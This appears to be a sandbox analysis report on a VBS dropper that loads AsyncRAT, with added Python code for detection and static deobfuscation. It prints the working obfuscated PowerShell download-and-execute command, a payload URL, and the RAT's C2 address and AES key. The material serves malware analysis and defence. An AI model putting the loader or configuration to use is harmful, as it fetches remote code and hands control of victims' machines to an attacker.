Analysis
- max time kernel: 147s
- max time network: 159s
- platform: windows10_x64
- resource: win10v20210410
- submitted: 21-07-2021 09:00
Static task: static1
Behavioral task: behavioral1
- Sample: 15.vbs
- Resource: win7v20210410
General
- Target: 15.vbs
- Size: 1KB
- MD5: 3e46e05d321065ab67c8b5d588ffe418
- SHA1: 16bbaae13819f996be9f81794df7c9f33ade9b7d
- SHA256: 15cf9daf5bad1a5a78783f675eb63850e216a690e0f3302738ce3bd825ba6fc1
- SHA512: c40d1599d412c9f0fdf8ec5e32916bd1ad3b25f189a61822a602bb675f664fcb683f52efc43e48ded468f79ccea77bca860b63375554ebae99cfffba211e1d59
Malware Config
Extracted: https://ia601405.us.archive.org/30/items/all-2542/ALL_2542.txt
Extracted: asyncrat 0.5.7B, C2 185.19.85.168:8888, mutex AsyncMutex_6SI8OkPnk
- aes_key: iaCQxXrg9VcwzLPunOt4DDhIibhcZSWL
- anti_detection: false
- autorun: false
- bdos: false
- delay: Default
- host: 185.19.85.168
- hwid: 3
- install_file:
- install_folder: %AppData%
- mutex: AsyncMutex_6SI8OkPnk
- pastebin_config: null
- port: 8888
- version: 0.5.7B
Signatures
- Async RAT payload (2 IoCs)
  resource                                                                       yara_rule
  behavioral2/memory/3844-142-0x0000000000400000-0x0000000000412000-memory.dmp  asyncrat
  behavioral2/memory/3844-143-0x000000000040C71E-mapping.dmp                     asyncrat
- Blocklisted process makes network request (2 IoCs)
  flow  pid   process
  10    1540  powershell.exe
  18    1540  powershell.exe
- Suspicious use of SetThreadContext (1 IoC)
  description                          pid   process         target process
  PID 1540 set thread context of 3844  1540  powershell.exe  aspnet_compiler.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  pid   process
  1540  powershell.exe  (x3)
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  description              pid   process
  Token: SeDebugPrivilege  1540  powershell.exe
- Suspicious use of WriteProcessMemory (10 IoCs)
  description                       pid   process         target process
  PID 2184 wrote to memory of 1540  2184  WScript.exe     powershell.exe       (x2)
  PID 1540 wrote to memory of 3844  1540  powershell.exe  aspnet_compiler.exe  (x8)
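The signature set above describes a three-process chain that is easy to express as detection logic: a script host (WScript.exe) spawning powershell.exe, powershell.exe spawning a signed .NET utility (aspnet_compiler.exe) with no arguments, and a PowerShell command line built from .Replace() chains and an ('I'+'EX') concatenation. The following is an added example, not part of the sandbox report: it runs those three rules over constructed process-creation events in Sysmon Event ID 1 shape. The PIDs and image paths are taken from this report, the obfuscated command line is abridged, the two benign control events are invented, and the extra hollowing targets beside aspnet_compiler.exe are an assumption to extend as needed.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class ProcEvent:
    """Minimal process-creation record (the Sysmon Event ID 1 fields we need)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Script hosts that should rarely be the direct parent of powershell.exe.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# Signed .NET utilities launched with no arguments only to be hollowed.
# aspnet_compiler.exe is the target in this report; the others are an assumption
# (common alternatives for the same loader style), extend as needed.
HOLLOW_TARGETS = {"aspnet_compiler.exe", "regasm.exe", "regsvcs.exe",
                  "msbuild.exe", "installutil.exe"}
# ('I'+'EX'), bare iex, or Invoke-Expression anywhere in the command line.
IEX_RE = re.compile(r"\(\s*'I'\s*\+\s*'EX'\s*\)|\biex\b|invoke-expression", re.I)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _has_no_arguments(cmdline: str) -> bool:
    """True when the command line is only the (optionally quoted) image path."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return end != -1 and s[end + 1:].strip() == ""
    return len(s.split()) == 1


def detect(events: List[ProcEvent]) -> List[Dict[str, object]]:
    """Apply the three rules to every event; return one alert per hit."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    alerts: List[Dict[str, object]] = []
    for e in events:
        parent: Optional[ProcEvent] = by_pid.get(e.ppid)
        child = _basename(e.image)
        pimg = _basename(parent.image) if parent else ""
        if pimg in SCRIPT_HOSTS and child == "powershell.exe":
            alerts.append({"rule": "script_host_spawns_powershell", "pid": e.pid, "parent": pimg})
        if pimg == "powershell.exe" and child in HOLLOW_TARGETS and _has_no_arguments(e.cmdline):
            alerts.append({"rule": "powershell_spawns_bare_dotnet_utility", "pid": e.pid, "parent": pimg})
        if (child == "powershell.exe"
                and e.cmdline.lower().count(".replace(") >= 2
                and IEX_RE.search(e.cmdline)):
            alerts.append({"rule": "obfuscated_powershell_cmdline", "pid": e.pid, "parent": pimg})
    return alerts


# Constructed events mirroring the tree in this report (PIDs and images from the
# report, obfuscated command line abridged) plus two invented benign controls.
EVENTS = [
    ProcEvent(2184, 1000, r"C:\Windows\System32\WScript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15.vbs"'),
    ProcEvent(1540, 2184, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
              r"$U='https://ia601405.us.archive.org/30/items/all-2542/ALL_2542.txt';"
              r"$M='DOWNxxING'.Replace('xx','LOADSTR');$C='SYxxM.NET.WEBCLIENT'.Replace('xx','STE');"
              r"&('I'+'EX')('(NEW-OBJECT $C).$M($U)')|&('I'+'EX');"),
    ProcEvent(3844, 1540, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"'),
    # Benign: an admin script, and a real precompile run with arguments.
    ProcEvent(4100, 4000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
    ProcEvent(4200, 4100, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe",
              r"aspnet_compiler.exe -v / -p C:\inetpub\wwwroot -f C:\build\out"),
]

if __name__ == "__main__":
    for a in detect(EVENTS):
        print(f"{a['rule']:40} pid={a['pid']} parent={a['parent']}")
```

The no-arguments check is what separates the hollowing target from a legitimate precompile: aspnet_compiler.exe has no useful behaviour without switches, so a bare launch by PowerShell is the signal, and the benign event with -v/-p/-f switches is left alone.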
Processes
1. C:\Windows\System32\WScript.exe
   "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15.vbs"
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY='https://ia601405.us.archive.org/30/items/all-2542/ALL_2542.txt';$SFDDHGFJGKHLJKHJGHFGFGDHFGHK='DOWNSDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDHING'.Replace('SDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDH','LOADSTR');$RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHCGJV='SYEFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGDM.NEDTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGUBClIENT'.Replace('EFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGD','STE').Replace('DTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGU','T.WE');$ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK = '(NAFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFYBJECT $RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFDGTFHJVBNBHGHCCGHJVBKNLJKHJHKLHHHHHHHHHHHHHRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY)'.Replace('AFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFY','EW-O').Replace('DGTFHJVBNBHGHCCGHJVBKNLJKHJHKLHHHHHHHHHHHHH','HCGJV ).$SFDDHGFJGKHLJKHJGHFGFGDHFGHK($S');$ERTTDYFYUGUYTREZRTFYGKUFDSS45HD6F7GK=&('I'+'EX')($ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK -Join '')|&('I'+'EX');
      Deobfuscated, this stage is (New-Object System.Net.WebClient).DownloadString('https://ia601405.us.archive.org/30/items/all-2542/ALL_2542.txt') | IEX: each .Replace() strips a junk run out of a split keyword, &('I'+'EX') is Invoke-Expression, and the text fetched from archive.org is executed as PowerShell. That fetched second stage is what maps the AsyncRAT payload into aspnet_compiler.exe (the SetThreadContext and WriteProcessMemory signatures above).
      - Blocklisted process makes network request
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
         "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
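The obfuscation in the PowerShell command line above is purely textual: every value is a single-quoted literal with junk spliced into a keyword, and a .Replace() chain removes the junk at run time, after which IEX evaluates a string in which the variables expand. That can be undone statically, without running anything. The following is an added example, not part of the sandbox report or the malware: it parses the recorded command line (copied verbatim into CMDLINE), folds each .Replace() chain the way .NET's ordinal String.Replace would, substitutes the variables the way IEX does when it evaluates the built string, and folds the ('I'+'EX') concatenation. The regexes assume this sample's shape (single-quoted literals, no ';' inside strings); they are not a general PowerShell parser.

```python
import re

# The PowerShell command line exactly as recorded in the process tree above.
CMDLINE = r"""$SRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY='https://ia601405.us.archive.org/30/items/all-2542/ALL_2542.txt';$SFDDHGFJGKHLJKHJGHFGFGDHFGHK='DOWNSDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDHING'.Replace('SDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDH','LOADSTR');$RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHCGJV='SYEFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGDM.NEDTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGUBClIENT'.Replace('EFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGD','STE').Replace('DTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGU','T.WE');$ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK = '(NAFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFYBJECT $RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFDGTFHJVBNBHGHCCGHJVBKNLJKHJHKLHHHHHHHHHHHHHRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY)'.Replace('AFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFY','EW-O').Replace('DGTFHJVBNBHGHCCGHJVBKNLJKHJHKLHHHHHHHHHHHHH','HCGJV ).$SFDDHGFJGKHLJKHJGHFGFGDHFGHK($S');$ERTTDYFYUGUYTREZRTFYGKUFDSS45HD6F7GK=&('I'+'EX')($ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK -Join '')|&('I'+'EX');"""

# $name='literal'.Replace('old','new')...  (single-quoted PowerShell strings; '' escapes a quote)
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'((?:[^']|'')*)'((?:\.Replace\('(?:[^']|'')*','(?:[^']|'')*'\))*)")
REPLACE_RE = re.compile(r"\.Replace\('((?:[^']|'')*)','((?:[^']|'')*)'\)")
CONCAT_RE = re.compile(r"\('((?:[^']|'')*)'\+'((?:[^']|'')*)'\)")   # ('I'+'EX') -> IEX
VAR_RE = re.compile(r"\$(\w+)")


def ps_unquote(s: str) -> str:
    """Undo the '' escape used inside single-quoted PowerShell strings."""
    return s.replace("''", "'")


def resolve_assignments(cmd: str) -> dict:
    """Fold each assignment's .Replace() chain at parse time; nothing is executed."""
    env = {}
    for m in ASSIGN_RE.finditer(cmd):
        name, value, chain = m.group(1), ps_unquote(m.group(2)), m.group(3)
        for old, new in REPLACE_RE.findall(chain):
            value = value.replace(ps_unquote(old), ps_unquote(new))  # .NET Replace is ordinal
        env[name] = value
    return env


def expand(text: str, env: dict, depth: int = 8) -> str:
    """Substitute $name with its value, as IEX does when evaluating the built string."""
    for _ in range(depth):  # bounded so a self-referencing value cannot loop forever
        new = VAR_RE.sub(lambda m: env.get(m.group(1), m.group(0)), text)
        if new == text:
            break
        text = new
    return text


def deobfuscate(cmd: str):
    """Return (resolved variables, the final statement with variables and 'I'+'EX' folded)."""
    env = resolve_assignments(cmd)
    env = {k: expand(v, env) for k, v in env.items()}
    last = cmd.rstrip(";").split(";")[-1]   # the statement that actually runs
    last = CONCAT_RE.sub(lambda m: ps_unquote(m.group(1)) + ps_unquote(m.group(2)), last)
    return env, expand(last, env)


if __name__ == "__main__":
    env, final = deobfuscate(CMDLINE)
    for name, value in env.items():
        print(f"${name[:10]}... = {value}")
    print(final)
```

The resolved statement is &IEX((NEW-OBJECT SYSTEM.NET.WEBClIENT ).DOWNLOADSTRING(https://ia601405.us.archive.org/30/items/all-2542/ALL_2542.txt) -Join '')|&IEX; -Join '' over a single string is a no-op, so the first IEX evaluates the download expression and the second executes whatever ALL_2542.txt contains. The URL and the two keywords are the indicators worth extracting, not the random variable names, which change per build.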
Downloads
- memory/1540-114-0x0000000000000000-mapping.dmp
- memory/1540-120-0x0000027D7B780000-0x0000027D7B781000-memory.dmp (4KB)
- memory/1540-123-0x0000027D7C620000-0x0000027D7C621000-memory.dmp (4KB)
- memory/1540-129-0x0000027D79D63000-0x0000027D79D65000-memory.dmp (8KB)
- memory/1540-128-0x0000027D79D60000-0x0000027D79D62000-memory.dmp (8KB)
- memory/1540-130-0x0000027D79D66000-0x0000027D79D68000-memory.dmp (8KB)
- memory/1540-141-0x0000027D7B800000-0x0000027D7B80E000-memory.dmp (56KB)
- memory/3844-142-0x0000000000400000-0x0000000000412000-memory.dmp (72KB)
- memory/3844-143-0x000000000040C71E-mapping.dmp
- memory/3844-149-0x00000000056D0000-0x00000000056D1000-memory.dmp (4KB)